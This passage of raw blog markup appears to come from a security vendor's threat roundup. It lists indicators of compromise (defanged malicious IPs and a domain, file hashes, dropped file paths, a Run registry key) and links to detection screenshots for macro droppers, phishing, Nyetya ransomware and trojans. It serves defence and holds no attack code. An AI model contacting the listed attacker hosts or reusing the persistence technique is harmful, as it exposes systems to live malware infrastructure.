src="https://3.bp.blogspot.com/-Uaaol5f_kuk/WRNnk9-GYDI/AAAAAAAAA80/c6qsYVz-hcM5CPhFuFQnHk3X4b1J6C6-ACLcB/s1600/amp-tg-proxy-umbrella.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/--f9EsASNCBI/WV-m8ct28PI/AAAAAAAAASo/U4Dc9okXDdUedkbDhLCRfV2kPTYEa4RRACLcBGAs/s1600/Doc_Dropper_Agent_6332127_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://4.bp.blogspot.com/--f9EsASNCBI/WV-m8ct28PI/AAAAAAAAASo/U4Dc9okXDdUedkbDhLCRfV2kPTYEa4RRACLcBGAs/s320/Doc_Dropper_Agent_6332127_0_amp.png" width="320" 
/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-ogMbT-9uy3M/WV-nC3PYqpI/AAAAAAAAASs/cJniRJPrkEolwlhu9iZa6Y6hsEc3So9LACLcBGAs/s1600/Doc_Dropper_Agent_6332127_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="723" data-original-width="1237" height="372" src="https://4.bp.blogspot.com/-ogMbT-9uy3M/WV-nC3PYqpI/AAAAAAAAASs/cJniRJPrkEolwlhu9iZa6Y6hsEc3So9LACLcBGAs/s640/Doc_Dropper_Agent_6332127_0_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-YnXzFa3wcvs/WV-nc80b-qI/AAAAAAAAASw/17I-Ykht2PgzQDjjrIqeB1YUafWpt0LbQCLcBGAs/s1600/Doc_Dropper_Agent_6332127_0_umbrella1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="710" data-original-width="1241" height="366" src="https://3.bp.blogspot.com/-YnXzFa3wcvs/WV-nc80b-qI/AAAAAAAAASw/17I-Ykht2PgzQDjjrIqeB1YUafWpt0LbQCLcBGAs/s640/Doc_Dropper_Agent_6332127_0_umbrella1.png" width="640" /&gt;&lt;/a&gt; &lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Doc.Macro.Obfuscation-6331107-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;185[.]165[.]29[.]36&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;\Users\Administrator\Documents\20170705\PowerShell_transcript.PC.0WdK03OL.20170705095145.txt&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;7ffb78b5dee7b2d48155236daaea99b9887ff61ec107d48a2522c951795f3353&lt;/li&gt;&lt;li&gt;af89ebcecc2478cb5f90696aa75aaa3dca27c4928265b4b6833e95b5672d7a0a&lt;/li&gt;&lt;li&gt;1a3bd5acc39ff619417fc217786f8b6338348a1f5eda994cbd03a5d014d351b8&lt;/li&gt;&lt;li&gt;8db59629e0b972ca9aa4da3dd56278340dc1f4ad7849e536bd2a1dc2c8ec59ff&lt;/li&gt;&lt;li&gt;1e56463b3aebc9fdf435ca3910a7db4e5a1c9f7b6568da5ced62b2451345eb68&lt;/li&gt;&lt;li&gt;0696df98c9074fc4c05454149e9a9ce7f3bfec9d19852691a49919027aa2be05&lt;/li&gt;&lt;li&gt;01d024ae353d2c4349fb13bfff1417e77ee2f85c75834f91762f80ca1d25a0c9&lt;/li&gt;&lt;li&gt;f38d35b8be18d3efe2394929184ad41e9e7c1f699bbc5cdebc4783b159075c66&lt;/li&gt;&lt;li&gt;c5ceecdc491077b8db797d1c65eed03efed8ea28cd0ee5d0926e3fa591920426&lt;/li&gt;&lt;li&gt;441e093374df7b806bf883d564810c8733b5f664add7baa4a8b7df6c49b04dcf&lt;/li&gt;&lt;li&gt;403589bd4b2c275564aac4382800eaf5836ff61817ddb76afb9b7c7f24b0c0e9&lt;/li&gt;&lt;li&gt;ef4685089d285ce677bc2aa2f2490dd25120d2af19fb6d2570adb03f0a5a3e7a&lt;/li&gt;&lt;li&gt;1d7bd5817b240a053cac0c6b3af1d848ed4b03e6bd334bd2e040800215d8d601&lt;/li&gt;&lt;li&gt;dc4c028949fdd43c7d67fe085e4c85a62633a38e49a510e71d41270008fd29fa&lt;/li&gt;&lt;li&gt;c07cdfd59b7ea1bdd2a6e267df60300bf23b1888f0582ef050946d0cba571f08&lt;/li&gt;&lt;li&gt;6cea69fa05cbf2a0db2ca40684ccbf3e4ea4744f5f6ae27655871d35cc6c85bd&lt;/li&gt;&lt;li&gt;ec988f1b09c617c1b609e25aea76e7afa871bb2188accd75f3dd24d0834c5c47&lt;/li&gt;&lt;li&gt;29013332f09195261f8be7fd43674e4e5132a28744ed52a45d787646a6e8659f&lt;/li&gt;&lt;li&gt;c30d4d4b41d7f690762ef26ffdbf14c7eff7ce92e7b8cfa87f5182bb057f05a2&lt;/li&gt;&lt;li&gt;ee97cf5279ca40e5e3d879f4a8e0fdec6b3a5fb7547ece74252c72419df0a6fd&lt;/li&gt;&
lt;li&gt;877107ecf0a698fad3a210289777dc647650c493f11cb384044a879efb3f16fb&lt;/li&gt;&lt;li&gt;123abdbf3c470dde32d7cbfa97e0393eaf602a3befa8050dfe8738a1c4b14768&lt;/li&gt;&lt;li&gt;124e908d1670ede9541b4f0ed6376dd03c62d1cf7b0ff22943a7fa3be90ce238&lt;/li&gt;&lt;li&gt;ff7706bdd749accba1ea5c49903fb200af7fb3edf3e95d5f9686e78ec699847e&lt;/li&gt;&lt;li&gt;470918fd1ed47e4454af807c3b14b55314cb07a86d053ff83f3233628f08bd8e&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-WcjQB5z7azY/WPEvFYVUpfI/AAAAAAAAA2o/9A2DqIoERHYxdyq2wats6A7E36it0gBdACLcB/s400/no-netsec.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-VXpTlovFgbo/WV-ogemcXCI/AAAAAAAAATI/E62IUJ1lx4oUty4dJ2GC0LUjRQtmfWL-ACLcBGAs/s1600/Doc_Macro_Obfuscation_6331107_0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="217" src="https://4.bp.blogspot.com/-VXpTlovFgbo/WV-ogemcXCI/AAAAAAAAATI/E62IUJ1lx4oUty4dJ2GC0LUjRQtmfWL-ACLcBGAs/s320/Doc_Macro_Obfuscation_6331107_0_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 
href="https://1.bp.blogspot.com/-FsFXdRU-feM/WV-okUcgMYI/AAAAAAAAATM/ZCD-oDbVNYUmi7Jbm0B8QvVWDl2aJgmxwCLcBGAs/s1600/Doc_Macro_Obfuscation_6331107_0_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="1017" data-original-width="1237" height="526" src="https://1.bp.blogspot.com/-FsFXdRU-feM/WV-okUcgMYI/AAAAAAAAATM/ZCD-oDbVNYUmi7Jbm0B8QvVWDl2aJgmxwCLcBGAs/s640/Doc_Macro_Obfuscation_6331107_0_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-Apn_rNCext4/WV-pwCM33VI/AAAAAAAAATY/PQiWcvQ_rIQfSENjLkagn7xgX0ONn_cmQCLcBGAs/s1600/Doc_Macro_Obfuscation_6331107_0_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="600" data-original-width="1092" height="350" src="https://1.bp.blogspot.com/-Apn_rNCext4/WV-pwCM33VI/AAAAAAAAATY/PQiWcvQ_rIQfSENjLkagn7xgX0ONn_cmQCLcBGAs/s640/Doc_Macro_Obfuscation_6331107_0_umbrella.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-EuH98wynXXo/WV-p7exLzRI/AAAAAAAAATc/b5K8VApEBS8XoGuNRzFEmt-72j-loNB6wCLcBGAs/s1600/Doc_Macro_Obfuscation_6331107_0_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="406" data-original-width="716" height="362" src="https://4.bp.blogspot.com/-EuH98wynXXo/WV-p7exLzRI/AAAAAAAAATc/b5K8VApEBS8XoGuNRzFEmt-72j-loNB6wCLcBGAs/s640/Doc_Macro_Obfuscation_6331107_0_malware.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" 
style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Phishing.NikoLata-6332081-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;176[.]31[.]115[.]114&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;bigpicturepop[.]com&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-gOZ5OES86_c/WPEu6PXqqyI/AAAAAAAAA2k/rhzBmZWBIY8_NOPnIThu8JGsXhdT5NuhACLcB/s400/amp-tg-umbrellla-only.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-gOZ5OES86_c/WPEu6PXqqyI/AAAAAAAAA2k/rhzBmZWBIY8_NOPnIThu8JGsXhdT5NuhACLcB/s400/amp-tg-umbrellla-only.png" width="400"
/&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-Jr43VR4dOD4/WV-qemUsPHI/AAAAAAAAATg/gE6vbWVqY8M-fMDLv8TmsLJmjNqSQDLagCLcBGAs/s1600/NikoLata_amp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://4.bp.blogspot.com/-Jr43VR4dOD4/WV-qemUsPHI/AAAAAAAAATg/gE6vbWVqY8M-fMDLv8TmsLJmjNqSQDLagCLcBGAs/s320/NikoLata_amp.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-YKpEKR06vIo/WV-qn3T4EFI/AAAAAAAAATk/s8hE6jT1Zx0n96-GQtlxObVg6vUacL4PwCLcBGAs/s1600/NikoLata_tg.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="807" data-original-width="1237" height="416" src="https://4.bp.blogspot.com/-YKpEKR06vIo/WV-qn3T4EFI/AAAAAAAAATk/s8hE6jT1Zx0n96-GQtlxObVg6vUacL4PwCLcBGAs/s640/NikoLata_tg.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Umbrella&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-9EJoof8JSCM/WV-qtAtv4SI/AAAAAAAAATo/VvPWw9rGmmUOEu7rhxlaBrH2Fz7P__pWwCLcBGAs/s1600/NikoLata_umbrella.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="600" data-original-width="1092" height="350" src="https://2.bp.blogspot.com/-9EJoof8JSCM/WV-qtAtv4SI/AAAAAAAAATo/VvPWw9rGmmUOEu7rhxlaBrH2Fz7P__pWwCLcBGAs/s640/NikoLata_umbrella.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; 
text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-q-QYDQgpKNE/WV-qymNDcSI/AAAAAAAAATs/XO5ne6SqIW8jxbnbkeKZm1KtBIxWx_ekwCLcBGAs/s1600/NikoLata_263517589_SCR_8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-q-QYDQgpKNE/WV-qymNDcSI/AAAAAAAAATs/XO5ne6SqIW8jxbnbkeKZm1KtBIxWx_ekwCLcBGAs/s640/NikoLata_263517589_SCR_8.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Ransomware.Nyetya-6331387-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%SystemDrive%\WINDOWS\perfc.dat&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745&lt;/li&gt;&lt;li&gt;eae9771e2eeb7ea3c6059485da39e77b8c0c369232f01334954fbac1c186c998&lt;/li&gt;&lt;li&gt;02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" imageanchor="1" style="margin-left: 1em; 
margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://3.bp.blogspot.com/-RE98hgPe9Hw/WOf00kgNpzI/AAAAAAAAAy8/v2n5vvA9kGgNBMZsy9b3eJQCwsCW2hA5QCLcB/s400/amp-threatgrid-only.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-xTAafbchxZY/WV-rHjCii_I/AAAAAAAAATw/wr7QkcV6nig42-bmsDTz-Yg5UNjZkluHQCLcBGAs/s1600/Win_Ransomware_Nyetya_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://3.bp.blogspot.com/-xTAafbchxZY/WV-rHjCii_I/AAAAAAAAATw/wr7QkcV6nig42-bmsDTz-Yg5UNjZkluHQCLcBGAs/s320/Win_Ransomware_Nyetya_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-uu00ujtysLw/WV-rMHdzFxI/AAAAAAAAAT0/NiHxeMCI808qwjN2R29YspyQzRTNpXHnwCLcBGAs/s1600/Win_Ransomware_Nyetya_threatgrid.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="628" data-original-width="1600" height="250" src="https://4.bp.blogspot.com/-uu00ujtysLw/WV-rMHdzFxI/AAAAAAAAAT0/NiHxeMCI808qwjN2R29YspyQzRTNpXHnwCLcBGAs/s640/Win_Ransomware_Nyetya_threatgrid.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;Screenshot&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-P8Q4my8dXys/WV-rR0ISxAI/AAAAAAAAAT4/LTPPKr1d1DE4gO905iG2Cm7Z28JHtVJ3wCLcBGAs/s1600/Win_Ransomware_Nyetya_malware.png" 
imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="800" data-original-width="1440" height="354" src="https://4.bp.blogspot.com/-P8Q4my8dXys/WV-rR0ISxAI/AAAAAAAAAT4/LTPPKr1d1DE4gO905iG2Cm7Z28JHtVJ3wCLcBGAs/s640/Win_Ransomware_Nyetya_malware.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Fileinfector-67&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Mutexes&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;IP Addresses&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Domain Names&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;N/A&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;Files and or directories created&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\i386\mxdwdrv.dll&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\Security\directories.acrodata&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\8.0\AdobeSysFnt08.lst&lt;/li&gt;&lt;li&gt;%CommonProgramFiles%\Microsoft 
Shared\Filters\VISFILT.DLL&lt;/li&gt;&lt;li&gt;%SystemDrive%\AUTOEXEC.BAT&lt;/li&gt;&lt;li&gt;%System32%\wdi\LogFiles\WdiContextLog.etl.001&lt;/li&gt;&lt;li&gt;%SystemDrive%\CONFIG.SYS&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\10.0\Security\CRLCache\48B76449F3D5FEFA1133AA805E420F0FCA643651.crl&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\JSCache\GlobData&lt;/li&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\amd64\msxpsinc.gpd&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\Security\CRLCache\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl&lt;/li&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\i386\filterpipelineprintproc.dll&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\JSCache\GlobSettings&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\10.0\Security\addressbook.acrodata&lt;/li&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\i386\xpssvcs.dll&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\7.0\Updater\udstore.js&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\7.0\UserCache.bin&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\10.0\ReaderMessages&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\TMDocs.sav&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\assets\assets-140109170701Z-78340&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\7.0\Collab\RSS&lt;/li&gt;&lt;li&gt;%SystemDrive%\c2d124b8466cec6b3e47c4\i386\msxpsdrv.inf&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\11.0\TMGrpPrm.sav&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\10.0\JavaScripts\glob.settings.js&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\8.0\Preferences\AutoFillDefaults.dat&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\8.0\Synchronizer\adobesynchronizersu80&lt;/li&gt;&lt;li&gt;%AppData%\Adobe\Acrobat\8.0\AdobeCMapFnt08.lst&lt;/li&gt;&lt;li&gt;%CommonProgramFiles%\Microsoft Shared\Filters\msgfilt.dll&lt;/li&gt;&lt;/ul&gt;&lt;b&gt;File Hashes&lt;/b&gt;&lt;br 
/&gt;&lt;ul&gt;&lt;li&gt;414d5a6eb59a5597774e3e69ead25ac64e5c5805d899886fc4c53ed0e4b1960d&lt;/li&gt;&lt;li&gt;f9f0449bd2187f8a69a2e8a2eebae77c45d422900a762664847f4b097796bec5&lt;/li&gt;&lt;li&gt;aab0014dbda65fb1ae5340a8b6da731aaa3215bb340c7df80b5b033ad2533001&lt;/li&gt;&lt;li&gt;29ba1dae0c75b5d67de2fb832a65a0a8d226f9585f1a3e334926259065355618&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;h4&gt;Coverage&lt;/h4&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="297" src="https://4.bp.blogspot.com/-lMcm16MfzdA/WRTPVW_BAII/AAAAAAAAA9I/TUwW9Ai4QFAh5FURDnAbZJXWJ_Pc0etyACLcB/s1600/amp-esa-proxy-tg.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h4&gt;Screenshots of Detection&lt;/h4&gt;&lt;h4&gt;&amp;nbsp;&lt;/h4&gt;&lt;b&gt;AMP&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-TcREmaXCxOQ/WV-rjACVPvI/AAAAAAAAAT8/t9wltmq9husP4BiYORehazAZCua39otSgCLcBGAs/s1600/Win_Trojan_Fileinfector_67_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="481" data-original-width="702" height="218" src="https://1.bp.blogspot.com/-TcREmaXCxOQ/WV-rjACVPvI/AAAAAAAAAT8/t9wltmq9husP4BiYORehazAZCua39otSgCLcBGAs/s320/Win_Trojan_Fileinfector_67_amp.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;b&gt;ThreatGrid&lt;/b&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-JQAip_0euG8/WV-roDDox-I/AAAAAAAAAUA/GUo-I00SyWEd-6laRw_WOFCPxC6zIsiCQCLcBGAs/s1600/Win_Trojan_Fileinfector_67_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 
1em;"&gt;&lt;img border="0" data-original-height="450" data-original-width="1091" height="262" src="https://4.bp.blogspot.com/-JQAip_0euG8/WV-roDDox-I/AAAAAAAAAUA/GUo-I00SyWEd-6laRw_WOFCPxC6zIsiCQCLcBGAs/s640/Win_Trojan_Fileinfector_67_tg.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;hr /&gt;&lt;br /&gt;&lt;h3&gt;Win.Trojan.Fynloski-6332091-0&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;Indicators of Compromise&lt;/h4&gt;&lt;br /&gt;&lt;b&gt;Registry Keys&lt;/b&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;&amp;lt;HKCU&amp;gt;\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN&lt;/b&gt;&lt;/li&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Value: 